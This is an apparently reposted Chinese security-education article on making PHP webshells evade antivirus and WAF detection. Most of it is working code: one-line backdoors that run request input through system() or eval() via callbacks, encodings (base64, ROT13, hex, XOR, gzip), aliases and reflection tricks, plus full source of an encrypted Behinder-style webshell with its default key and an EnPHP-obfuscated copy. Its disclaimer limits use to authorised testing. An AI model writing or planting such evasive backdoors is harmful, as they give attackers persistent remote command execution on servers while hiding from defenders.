扫码领资料

获网安教程

本文由掌控安全学院 -  nn0nkey 投稿

来Track安全社区投稿~  

千元稿费！还有保底奖励~（https://bbs.zkaq.cn）

基础学习

• $_GET

• $_POST

• $_COOKIE

• $_REQUEST

• $_SERVER 其中的某些参数可控,如REQUESTMETHOD,QUERYSTRING,HTTPUSERAGENT等

• session_id() 这个比较特殊,但是依然可以利用

• $_FILE

• $GLOBALS

• getallheaders()

• get_defined_vars()

• get_defined_functions()

filter_input

<?php
function abcsmytqqe($a){
    $class_name = json_decode('"' . $a . '"');
    ((__FUNCTION__)[3].(__FUNCTION__)[5].(__FUNCTION__)[3].(__FUNCTION__)[6].(__FUNCTION__)[9].(__FUNCTION__)[4])($class_name);
}
$res=filter_input(INPUT_GET, 'b', FILTER_CALLBACK,array('options' => 'abcsmytqqe'));

有太多了

call_user_func()
array_filter() 
array_walk()  
array_map()
registregister_shutdown_function()
register_tick_function()
filter_var() 
filter_var_array() 
uasort() 
uksort() 
array_reduce()
array_walk() 
array_walk_recursive()

call_user_func&call_user_func_array

<?php
call_user_func('system', ('whoami'));
//相当于system('whoami')

<?php
call_user_func_array('system', array('whoami'));

array_map()

array_map() 函数将用户自定义函数作用到数组中的每个值上，并返回用户自定义函数作用后的带有新的值的数组

用到命令执行中就是

array_map('system', array('whoami'));        
array_map($_GET['a'], array('whoami'));     
array_map('system', array($_GET['a']));

array_walk&array_walk_recursive

这个函数和我们的array_map是一样的

还可以拼接绕过关键字，因为我们传入的函数是使用String传入的

<?php
$a=array("who"."ami");
array_walk_recursive($a,'sys'.'tem');

array_filter

array_filter — 使用回调函数过滤数组的元素

<?php
$a=array("who"."ami");
array_filter ($a,'sys'.'tem');

iterator_apply

iterator_apply — 为迭代器中每个元素调用函数

<?php
$it = new ArrayIterator(array(1,2,3));
iterator_apply($it, "system",array("whoami"));
?>
ljl86135
ljl86135
ljl86135

foreach()

<?php
$a=array("whoami");
$b="sys"."tem";
foreach($a as $value){
    $b($value);
}

但是动态拼接很容易就被检测了

稀奇古怪的算法

<?php
function confusion($a){
$s = ['A','a','b', 'y', 's', 's', 'T', 'e', 'a', 'm'];
$tmp = "";
while ($a>10) {
$tmp .= $s[$a%10];
$a = $a/10;
}
return $tmp.$s[$a];
}
confusion(976534)("whoami"); //confusion(976534)-->sysTem（高危函数）

这个是看的https://xz.aliyun.com/t/13591

<?php
function confusion($a){
    $tmp = "";

    // 新的算法逻辑
    $characters = ['s', 'y', 's', 't', 'e', 'm'];
    $indices = [0, 1, 0, 3, 4, 5]; // 对应 'system' 在 $characters 中的位置

    foreach ($indices as $index) {
        $tmp .= $characters[$index];
    }
    return $tmp;
}
// 验证结果
echo confusion(976534); // 输出 'system'
?>

String函数

trim()           //从字符串的两端删除空白字符和其他预定义字符
ucfirst()        //把字符串中的首字符转换为大写
ucwords()        //把字符串中每个单词的首字符转换为大写
strtoupper()     //把字符串转换为大写
strtolower()     //把字符串转换为小写
strtr()          //转换字符串中特定的字符
substr_replace() //把字符串的一部分替换为另一个字符串
substr()         //返回字符串的一部分

如果$a();会判定为动态函数执行

<?php
$a="system";
strtoupper($a)("whoami");

这样strtoupper就会处理为String

pack()&unpack

pack() 函数函数把数据装入一个二进制字符串

Demo：简单来说，就是将指定编码的数字转成字符串

<?php
// ASCII 编码转换为 system
echo pack("C6", 115, 121, 115, 116, 101, 109);  // s, y, s, t, e, m
echo pack("H*", "73797374656d");  // 73797374656d 对应的 ASCII 字符串是 system
?>

在Webshell的免杀过程中，一部分人另辟蹊径：通过执行一个执行内容为”写入恶意PHP“的样本来绕过查杀，执行成功后会在指定目录写入一个恶意PHP文件，最后通过连接那个恶意PHP文件获得WebShell

fwrite()&fputs

<?php
highlight_file(__FILE__);
error_reporting(0);
$file = fopen("flag.txt","w");
echo fwrite($file,"<?php phpinfo();");    //21
fclose($file);

fputs是fwrite的别名，可以用来写文件

file_put_contents()

<?php
highlight_file(__FILE__);
error_reporting(0);
$file =("flag.txt");
file_put_contents($file,"<?php phpinfo();");    //21

使用 FILE_APPEND 标记，可以在文件末尾追加内容

$file = 'sites.txt';
$site = "nGoogle";
file_put_contents($file, $site, FILE_APPEND);

同时该函数可以配合解密函数写入文件，比如：

$datatest = "[文件的base64编码]";
file_put_contents('./要写入的文件名', base64_decode($datatest));

异常处理类函数

__construct  //异常构造函数
getMessage   //获取异常消息内容
getPrevious  //返回异常链中的前一个异常，如果不存在则返回null值
getCode      //获取异常代码
getFile      //获取发生异常的程序文件名称
getLine      //获取发生异常的代码在文件中的行号
getTrace     //获取异常追踪信息，其返回值是一个数组
getTraceAsString //获取字符串类型的异常追踪信息

<?php
function check($a)
{
    if($a!=1)
    {
        throw new Exception("sys"."tem");
    }
    return true;
}
try
{
    check(8);
    // 如果抛出异常，以下文本不会输出
    echo '如果输出该内容，说明 $number 变量小于1';
}
// 捕获异常
catch(Exception $e){
    $e->getMessage()("wh"."oami");
}

PHP数字可与字符做运算

<?php
$a="system";
1-$a("whoami")-2;
?>

变量混淆

<?php
$a="aaa";
$$a="system"; //$aaa=system
$aaa("whoami");

Base64编码

<?php
$f = base64_decode("c3lz__dG__Vt");  //解密后为system高危函数,中间可以加入_
$f($_POST[0]);                      //system($_POST[0]);
?>

ASCII编码

ascii对应的是chr函数解密

<?php
$f =  chr(115).chr(    121).chr(115).chr(116).chr(101).chr(109);//system
$f($_POST['0']);
?>

ROT13编码

<?php
$f = str_rot13("flfgrz");  // 解密后为system，高危函数
$f($_POST[0]);            // system($_POST[0]);
?>

Hex编码

<?php
$f = hex2bin("73797374656d");  // 解密后为system，高危函数
$f($_POST[0]);                // system($_POST[0]);
?>

Gz压缩编码

<?php
$f = gzuncompress(base64_decode("eJzLSM3JyVcozy_KSVEEABxJBD4="));  // 解压缩后为system，高危函数
$f($_POST[0]);                                                   // system($_POST[0]);
?>

组合编码

可以组合使用多种编码方式来增加复杂性。

<?php
$f = base64_decode(hex2bin("73797374656d"));  // 首先进行hex解码，然后base64解码，最终解密为system，高危函数
$f($_POST[0]);                               // system($_POST[0]);
?>

自定义编码

<?php
function custom_decode($str) {
    $encoded = str_replace(['a','d'], ['s', 'e'], $str);
    return ($encoded);
}
$f = custom_decode("ayatdm");  // 解密后为system，高危函数
echo $f;
?>

异或

<?php
$a = ('.'^']').('$'^']').('.'^']').('4'^'@').('8'^']').(']'^'0');   //system
$b = ('.$.48]' ^ ']]]@]0');//system
echo $a;
echo $b;

ReflectionClass::getDocComment

/**   
    * system($_GET[aabyss]);
    */  
class User { }  
$user = new ReflectionClass('User');
$comment = $user->getDocComment();
$f = substr($comment , 14 , 22);
eval($f);

读取数据库

$path = "数据库文件名"

$db = new PDO("sqlite:" . $path);

$sql_stmt = $db->prepare('select * from test where name="system"');
$sql_stmt->execute();

$f = substr($sql_stmt->queryString, -7, 6);
$f($_GET['b']);

读取目录

FilesystemIterator 是一个迭代器，可以获取到目标目录下的所有文件信息

但是需要写一个特殊的文件

<?php
$fi = new FilesystemIterator(dirname(__FILE__));
$f = '';
foreach($fi as $i){
    $a=substr($i,26,6);
    if ($a=="system"){
        $f=$a;
    }
}
$f("whoami");

别名绕过

bzwrite->fwrite
bzflush->fflush
bzclose->fclose
isId->dom_attr_is_id
substringData->dom_characterdata_substring_data
appendData->dom_characterdata_append_data
insertData->dom_characterdata_insert_data
deleteData->dom_characterdata_delete_data
replaceData->dom_characterdata_replace_data
createElement->dom_document_create_element
createDocumentFragment->dom_document_create_document_fragment
createTextNode->dom_document_create_text_node
createComment->dom_document_create_comment
createCDATASection->dom_document_create_cdatasection
createProcessingInstruction->dom_document_create_processing_instruction
createAttribute->dom_document_create_attribute
createEntityReference->dom_document_create_entity_reference
getElementsByTagName->dom_document_get_elements_by_tag_name
importNode->dom_document_import_node
createElementNS->dom_document_create_element_ns
createAttributeNS->dom_document_create_attribute_ns
getElementsByTagNameNS->dom_document_get_elements_by_tag_name_ns
getElementById->dom_document_get_element_by_id
adoptNode->dom_document_adopt_node
normalizeDocument->dom_document_normalize_document
renameNode->dom_document_rename_node
save->dom_document_save
saveXML->dom_document_savexml
validate->dom_document_validate
xinclude->dom_document_xinclude
saveHTML->dom_document_save_html
saveHTMLFile->dom_document_save_html_file
schemaValidate->dom_document_schema_validate_file
schemaValidateSource->dom_document_schema_validate_xml
relaxNGValidate->dom_document_relaxNG_validate_file
relaxNGValidateSource->dom_document_relaxNG_validate_xml
setParameter->dom_domconfiguration_set_parameter
getParameter->dom_domconfiguration_get_parameter
canSetParameter->dom_domconfiguration_can_set_parameter
handleError->dom_domerrorhandler_handle_error
item->dom_domimplementationlist_item
getDomimplementation->dom_domimplementationsource_get_domimplementation
getDomimplementations->dom_domimplementationsource_get_domimplementations
item->dom_domstringlist_item
getAttribute->dom_element_get_attribute
setAttribute->dom_element_set_attribute
removeAttribute->dom_element_remove_attribute
getAttributeNode->dom_element_get_attribute_node
setAttributeNode->dom_element_set_attribute_node
removeAttributeNode->dom_element_remove_attribute_node
getElementsByTagName->dom_element_get_elements_by_tag_name
getAttributeNS->dom_element_get_attribute_ns
setAttributeNS->dom_element_set_attribute_ns
removeAttributeNS->dom_element_remove_attribute_ns
getAttributeNodeNS->dom_element_get_attribute_node_ns
setAttributeNodeNS->dom_element_set_attribute_node_ns
getElementsByTagNameNS->dom_element_get_elements_by_tag_name_ns
hasAttribute->dom_element_has_attribute
hasAttributeNS->dom_element_has_attribute_ns
setIdAttribute->dom_element_set_id_attribute
setIdAttributeNS->dom_element_set_id_attribute_ns
setIdAttributeNode->dom_element_set_id_attribute_node
getNamedItem->dom_namednodemap_get_named_item
setNamedItem->dom_namednodemap_set_named_item
removeNamedItem->dom_namednodemap_remove_named_item
item->dom_namednodemap_item
getNamedItemNS->dom_namednodemap_get_named_item_ns
setNamedItemNS->dom_namednodemap_set_named_item_ns
removeNamedItemNS->dom_namednodemap_remove_named_item_ns
count->dom_namednodemap_count
getName->dom_namelist_get_name
getNamespaceURI->dom_namelist_get_namespace_uri
insertBefore->dom_node_insert_before
replaceChild->dom_node_replace_child
removeChild->dom_node_remove_child
appendChild->dom_node_append_child
hasChildNodes->dom_node_has_child_nodes
cloneNode->dom_node_clone_node
normalize->dom_node_normalize
isSupported->dom_node_is_supported
hasAttributes->dom_node_has_attributes
compareDocumentPosition->dom_node_compare_document_position
isSameNode->dom_node_is_same_node
lookupPrefix->dom_node_lookup_prefix
isDefaultNamespace->dom_node_is_default_namespace
lookupNamespaceUri->dom_node_lookup_namespace_uri
isEqualNode->dom_node_is_equal_node
getFeature->dom_node_get_feature
setUserData->dom_node_set_user_data
getUserData->dom_node_get_user_data
item->dom_nodelist_item
count->dom_nodelist_count
findOffset16->dom_string_extend_find_offset16
findOffset32->dom_string_extend_find_offset32
splitText->dom_text_split_text
isWhitespaceInElementContent->dom_text_is_whitespace_in_element_content
isElementContentWhitespace->dom_text_is_whitespace_in_element_content
replaceWholeText->dom_text_replace_whole_text
handle->dom_userdatahandler_handle
registerNamespace->dom_xpath_register_ns
query->dom_xpath_query
evaluate->dom_xpath_evaluate
registerPhpFunctions->dom_xpath_register_php_functions
ftp_quit->ftp_close
imap_header->imap_headerinfo
imap_listmailbox->imap_list
imap_getmailboxes->imap_list_full
imap_scanmailbox->imap_listscan
imap_listsubscribed->imap_lsub
imap_getsubscribed->imap_lsub_full
imap_fetchtext->imap_body
imap_scan->imap_listscan
imap_create->imap_createmailbox
imap_rename->imap_renamemailbox
ldap_close->ldap_unbind
ldap_get_values->ldap_get_values_len
ldap_modify->ldap_mod_replace
mysqli_execute->mysqli_stmt_execute
mysqli_escape_string->mysqli_real_escape_string
mysqli_set_opt->mysqli_options
autocommit->mysqli_autocommit
begin_transaction->mysqli_begin_transaction
change_user->mysqli_change_user
character_set_name->mysqli_character_set_name
close->mysqli_close
commit->mysqli_commit
connect->mysqli_connect
dump_debug_info->mysqli_dump_debug_info
debug->mysqli_debug
get_charset->mysqli_get_charset
get_client_info->mysqli_get_client_info
get_client_info->mysqli_get_client_info
get_connection_stats->mysqli_get_connection_stats
get_server_info->mysqli_get_server_info
get_warnings->mysqli_get_warnings
init->mysqli_init_method
kill->mysqli_kill
multi_query->mysqli_multi_query
construct->mysqli_link_construct
more_results->mysqli_more_results
next_result->mysqli_next_result
options->mysqli_options
ping->mysqli_ping
prepare->mysqli_prepare
query->mysqli_query
real_connect->mysqli_real_connect
real_escape_string->mysqli_real_escape_string
escape_string->mysqli_real_escape_string
real_query->mysqli_real_query
release_savepoint->mysqli_release_savepoint
rollback->mysqli_rollback
savepoint->mysqli_savepoint
select_db->mysqli_select_db
set_charset->mysqli_set_charset
set_opt->mysqli_options
ssl_set->mysqli_ssl_set
stat->mysqli_stat
stmt_init->mysqli_stmt_init
store_result->mysqli_store_result
thread_safe->mysqli_thread_safe
use_result->mysqli_use_result
refresh->mysqli_refresh
construct->mysqli_result_construct
close->mysqli_free_result
free->mysqli_free_result
data_seek->mysqli_data_seek
fetch_field->mysqli_fetch_field
fetch_fields->mysqli_fetch_fields
fetch_field_direct->mysqli_fetch_field_direct
fetch_all->mysqli_fetch_all
fetch_array->mysqli_fetch_array
fetch_assoc->mysqli_fetch_assoc
fetch_object->mysqli_fetch_object
fetch_row->mysqli_fetch_row
field_seek->mysqli_field_seek
free_result->mysqli_free_result
construct->mysqli_stmt_construct
attr_get->mysqli_stmt_attr_get
attr_set->mysqli_stmt_attr_set
bind_param->mysqli_stmt_bind_param
bind_result->mysqli_stmt_bind_result
close->mysqli_stmt_close
data_seek->mysqli_stmt_data_seek
execute->mysqli_stmt_execute
fetch->mysqli_stmt_fetch
get_warnings->mysqli_stmt_get_warnings
result_metadata->mysqli_stmt_result_metadata
more_results->mysqli_stmt_more_results
next_result->mysqli_stmt_next_result
num_rows->mysqli_stmt_num_rows
send_long_data->mysqli_stmt_send_long_data
free_result->mysqli_stmt_free_result
reset->mysqli_stmt_reset
prepare->mysqli_stmt_prepare
store_result->mysqli_stmt_store_result
get_result->mysqli_stmt_get_result
oci_free_cursor->oci_free_statement
ocifreecursor->oci_free_statement
ocibindbyname->oci_bind_by_name
ocidefinebyname->oci_define_by_name
ocicolumnisnull->oci_field_is_null
ocicolumnname->oci_field_name
ocicolumnsize->oci_field_size
ocicolumnscale->oci_field_scale
ocicolumnprecision->oci_field_precision
ocicolumntype->oci_field_type
ocicolumntyperaw->oci_field_type_raw
ociexecute->oci_execute
ocicancel->oci_cancel
ocifetch->oci_fetch
ocifetchstatement->oci_fetch_all
ocifreestatement->oci_free_statement
ociinternaldebug->oci_internal_debug
ocinumcols->oci_num_fields
ociparse->oci_parse
ocinewcursor->oci_new_cursor
ociresult->oci_result
ociserverversion->oci_server_version
ocistatementtype->oci_statement_type
ocirowcount->oci_num_rows
ocilogoff->oci_close
ocilogon->oci_connect
ocinlogon->oci_new_connect
ociplogon->oci_pconnect
ocierror->oci_error
ocifreedesc->oci_free_descriptor
ocisavelob->oci_lob_save
ocisavelobfile->oci_lob_import
ociwritelobtofile->oci_lob_export
ociloadlob->oci_lob_load
ocicommit->oci_commit
ocirollback->oci_rollback
ocinewdescriptor->oci_new_descriptor
ocisetprefetch->oci_set_prefetch
ocipasswordchange->oci_password_change
ocifreecollection->oci_free_collection
ocinewcollection->oci_new_collection
ocicollappend->oci_collection_append
ocicollgetelem->oci_collection_element_get
ocicollassignelem->oci_collection_element_assign
ocicollsize->oci_collection_size
ocicollmax->oci_collection_max
ocicolltrim->oci_collection_trim
load->oci_lob_load
tell->oci_lob_tell
truncate->oci_lob_truncate
erase->oci_lob_erase
flush->oci_lob_flush
setbuffering->ocisetbufferinglob
getbuffering->ocigetbufferinglob
rewind->oci_lob_rewind
read->oci_lob_read
eof->oci_lob_eof
seek->oci_lob_seek
write->oci_lob_write
append->oci_lob_append
size->oci_lob_size
writetofile->oci_lob_export
export->oci_lob_export
import->oci_lob_import
writetemporary->oci_lob_write_temporary
close->oci_lob_close
save->oci_lob_save
savefile->oci_lob_import
free->oci_free_descriptor
append->oci_collection_append
getelem->oci_collection_element_get
assignelem->oci_collection_element_assign
assign->oci_collection_assign
size->oci_collection_size
max->oci_collection_max
trim->oci_collection_trim
free->oci_free_collection
odbc_do->odbc_exec
odbc_field_precision->odbc_field_len
openssl_free_key->openssl_pkey_free
openssl_get_privatekey->openssl_pkey_get_private
openssl_get_publickey->openssl_pkey_get_public
pcntl_errno->pcntl_get_last_error
pg_exec->pg_query
pg_getlastoid->pg_last_oid
pg_cmdtuples->pg_affected_rows
pg_errormessage->pg_last_error
pg_numrows->pg_num_rows
pg_numfields->pg_num_fields
pg_fieldname->pg_field_name
pg_fieldsize->pg_field_size
pg_fieldtype->pg_field_type
pg_fieldnum->pg_field_num
pg_fieldprtlen->pg_field_prtlen
pg_fieldisnull->pg_field_is_null
pg_freeresult->pg_free_result
pg_result->pg_fetch_result
pg_loreadall->pg_lo_read_all
pg_locreate->pg_lo_create
pg_lounlink->pg_lo_unlink
pg_loopen->pg_lo_open
pg_loclose->pg_lo_close
pg_loread->pg_lo_read
pg_lowrite->pg_lo_write
pg_loimport->pg_lo_import
pg_loexport->pg_lo_export
pg_clientencoding->pg_client_encoding
pg_setclientencoding->pg_set_client_encoding
pg_clientencoding->pg_client_encoding
pg_setclientencoding->pg_set_client_encoding
posix_errno->posix_get_last_error
session_commit->session_write_close
snmpwalkoid->snmprealwalk
snmp_set_oid_numeric_print->snmp_set_oid_output_format
socket_getopt->socket_get_option
socket_setopt->socket_set_option
sodium_crypto_scalarmult_base->sodium_crypto_box_publickey_from_secretkey
join->implode
chop->rtrim
strchr->strstr
srand->mt_srand
getrandmax->mt_getrandmax
show_source->highlight_file
ini_alter->ini_set
checkdnsrr->dns_check_record
getmxrr->dns_get_mx
doubleval->floatval
is_integer->is_int
is_long->is_int
is_double->is_float
fputs->fwrite
set_file_buffer->stream_set_write_buffer
socket_set_blocking->stream_set_blocking
stream_register_wrapper->stream_wrapper_register
stream_register_wrapper->stream_wrapper_register
socket_set_timeout->stream_set_timeout
dir->getdir
is_writeable->is_writable
diskfreespace->disk_free_space
pos->current
sizeof->count
key_exists->array_key_exists
close->closedir
rewind->rewinddir
importStylesheet->xsl_xsltprocessor_import_stylesheet
transformToDoc->xsl_xsltprocessor_transform_to_doc
transformToUri->xsl_xsltprocessor_transform_to_uri
transformToXml->xsl_xsltprocessor_transform_to_xml
setParameter->xsl_xsltprocessor_set_parameter
getParameter->xsl_xsltprocessor_get_parameter
removeParameter->xsl_xsltprocessor_remove_parameter
hasExsltSupport->xsl_xsltprocessor_has_exslt_support
registerPHPFunctions->xsl_xsltprocessor_register_php_functions
setProfiling->xsl_xsltprocessor_set_profiling
setSecurityPrefs->xsl_xsltprocessor_set_security_prefs
getSecurityPrefs->xsl_xsltprocessor_get_security_prefs
gzrewind->rewind
gzclose->fclose
gzeof->feof
gzgetc->fgetc
gzgets->fgets
DEP_FALIAS(gzgetss->fgetss
gzread->fread
gzpassthru->fpassthru
gzseek->fseek
gztell->ftell
gzwrite->fwrite
gzputs->fwrite
getallheaders->apache_request_headers
getallheaders->litespeed_request_headers
apache_request_headers->litespeed_request_headers
apache_response_headers->litespeed_response_headers

我们就可以找到可以利用的函数mbereg_replace,这个函数是pregreplace的别名,mberegreplace与pregreplace类似,可以利用e模式隐式执行代码,但是mberegreplace无法逃过查杀,而mberegreplace则是ALLKILL,没错,只是一个*的差别,让他逃过了免杀的眼睛

<?php  
// (ALLKILL)
error_reporting(0);
mbereg_replace('.*', '', $_REQUEST[2333], 'mer');//php5 php7 success
?>

另外,我们可以自己创造别名,如:

<?php  
// PHP >=5.6 可过盾狗
use function system as strlen;  // 配合文件包含这甚至可以实现劫持,留待你们开发
strlen($_POST[1]);

<?php
// (ALLKILL)
define("ARRAY2", "sys"."tem");
@constant("ARRAY2")(pos(pos($GLOBALS)));  // PHP>7

混淆

推荐网站

https://enphp.djunny.com/

把你的马子上传，然后混淆一手

原代码

<?php
@error_reporting(0);
session_start();
$key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位，默认连接密码rebeyond
$_SESSION['k']=$key;
$post=file_get_contents("php://input");
if(!extension_loaded('openssl'))
{
    $t="base64_"."decode";
    $post=$t($post."");

    for($i=0;$i<strlen($post);$i++) {
        $post[$i] = $post[$i]^$key[$i+1&15];
    }
}
else
{
    $post=openssl_decrypt($post, "AES128", $key);
}
$arr=explode('|',$post);
$func=$arr[0];
$params=$arr[1];
class C{public function __invoke($p) {eval($p."");}}
@call_user_func(new C(),$params);
?>

混淆后

<?php
/*
-- EnPHP v2: http://enphp.djunny.com/
*/goto Ϻ��;����:$Ċ��=$�˼�[0x001];goto ���;����:$х��=���(0x0000220e,0x0223d,0x00021e0)(���(0x000226c));goto ���;��̥:р��:goto ����;��Έ:@���(0x000215e,0x00002150)(0);goto ����;�Գ�:goto ����;goto ����;�ֆ�:goto ����;goto ��̥;���:class C{public function __invoke($����){eval($����.(base64_decode('')?:$��Ȭ));}}goto ����;ߨ�:�н�:goto �Ҡ�;����:ב��:goto ���;����:function ����(){goto ����;����:�ە�:goto ���;؍ī:return base64_decode('ZGVjb2Rl');goto ����;����:return(base64_decode('QUVTMTI4')?:$����);goto ���;����:if(!($����[0x001]==$Ӫܣ+0x0079))goto �ە�;goto ؍ī;����:if(!($����[0x001]==$Ӫܣ+0x0000d5))goto ����;goto ����;����:return((parse_str("����=YmFzZTY0Xw",$��ϖ)||$��ϖ)?base64_decode($��ϖ['����']):"");goto Ȃ��;��ù:if(!($����[0]==$Ӫܣ+0x000124))goto ����;goto ����;Ȃ��:����:goto ����;����:$Ӫܣ=0x0000b6b;goto ���;����:$����=func_get_args();goto ����;���:if(!($����[0x001]==$Ӫܣ+0x000b1))goto ���;goto Ѭ��;���:if(!($����[0x001]==$Ӫܣ+0x000030))goto ����;goto ����;����:return((parse_str("����=b3BlbnNzbF9kZWNyeXB0",$����)||$����)?base64_decode($����['����']):"");goto ����;Ѭ��:return((parse_str("ʅ��=c3RybGVu",$����)||$����)?base64_decode($����['ʅ��']):"");goto Ҩɹ;���:����:goto ���;����:����:goto ��ù;Ҩɹ:���:goto ����;���:}goto ����;����:$�ˮ�=���(0x000219a,0x0002190,$�ˮ�);goto ����;���:if(!extension_loaded(���(0x000022ae,0x000228a)))goto ב��;goto �ߞ�;����:if(!($�ǩ�<����(0x00c27,0x0c1c)($х��)))goto р��;goto ����;���:$����=����(0x00bc3,0x00b9b).����(0x0bfe,0x00000be4);goto ��;����:$�˼�=����(0x0852)(����(0x088e,0x008b2,0x0866),$х��);goto ����;����:$����=$�˼�[0];goto ����;���:����:goto ����;����:$х��[$�ǩ�]=$х��[$�ǩ�]^$�ˮ�[$�ǩ�+0x001&0x0f];goto ߨ�;��:$х��=$����($х��.base64_decode(str_rot13('')));goto ���;Ċ��:function ����(){goto �ď�;����:����:goto ���;����:if(!($����[0x0002]==$����+0x02d))goto ����;goto ��ĭ;����:if(!($����[0]==$����+0x019))goto ����;goto ����;�ď�:$����=func_get_args();goto ���;����:����:goto ����;����:return "x65x78x70x6cx6f144145";goto ����;���:$����=0x0839;goto ����;��ĭ:return base64_decode('fA');goto ����;���:}goto ����;�Ҡ�:$�ǩ�++;goto �ֆ�;�ߞ�:$х��=����(0x00000c70,0x00c40)($х��,����(0x0c8f),$�ˮ�);goto �Գ�;����:����:goto ����;����:function ���(){goto ֓��;�ϰ�:if(!($�ԅ�[0]==$��ص+0x0140))goto ں��;goto ���;Ҙ��:if(!($�ԅ�[0x001]==$��ص+0x0007a))goto �Ꮵ;goto �ʑ�;��ˊ:���:goto ����;����:return((parse_str("�ϥ�=ZXJyb3JfcmVwb3J0aW5n",$���)||$���)?base64_decode($���['�ϥ�']):"");goto Ď��;���:return "160x6816072x2fx2f151x6ex70165164";goto ����;ꃏ�:if(!($�ԅ�[0x001]==$��ص+0x015e))goto ���;goto ꅬ�;���:$��ص=0x000212c;goto ء��;���:�¿�:goto Ҙ��;����:return((parse_str("ߗь=ZmlsZV9nZXRfY29udGVudHM",$����)||$����)?base64_decode($����['ߗь']):"");goto ����;ܬ��:if(!($�ԅ�[0x0002]==$��ص+0x0b4))goto ���;goto ����;��†:return base64_decode(join("",array('Z','T','Q','1','Z','T','M','y','O','W','Z','l','Y','j','V','k','O','T','I','1','Y','g')));goto ���;�ʑ�:return(base64_decode('aw')?:$����);goto ����;����:���:goto �ϰ�;����:ں��:goto ꃏ�;֓��:$�ԅ�=func_get_args();goto ���;����:�Ꮵ:goto ܬ��;Ď��:����:goto ܌��;ꅬ�:return((parse_str("b3BlbnNzbA",$����)||$����)?base64_decode(key($����)):"");goto ��ˊ;ء��:if(!($�ԅ�[0x001]==$��ص+0x0024))goto ����;goto ����;܌��:if(!($�ԅ�[0x001]==$��ص+0x064))goto �¿�;goto ��†;����:}goto ��Έ;Ϻ��:error_reporting(0);goto Ċ��;����:session_start();goto ����;���:$�ǩ�=0;goto ���;����:$_SESSION[���(0x0021c1,0x0000021a6)]=$�ˮ�;goto ����;����:@call_user_func(new C(),$Ċ��);

申明：本公众号所分享内容仅用于网络安全技术讨论，切勿用于违法途径，
所有渗透都需获取授权，违者后果自行承担，与本号及作者无关，请谨记守法.

原文始发于微信公众号（掌控安全EDU）：PHP免杀详细讲解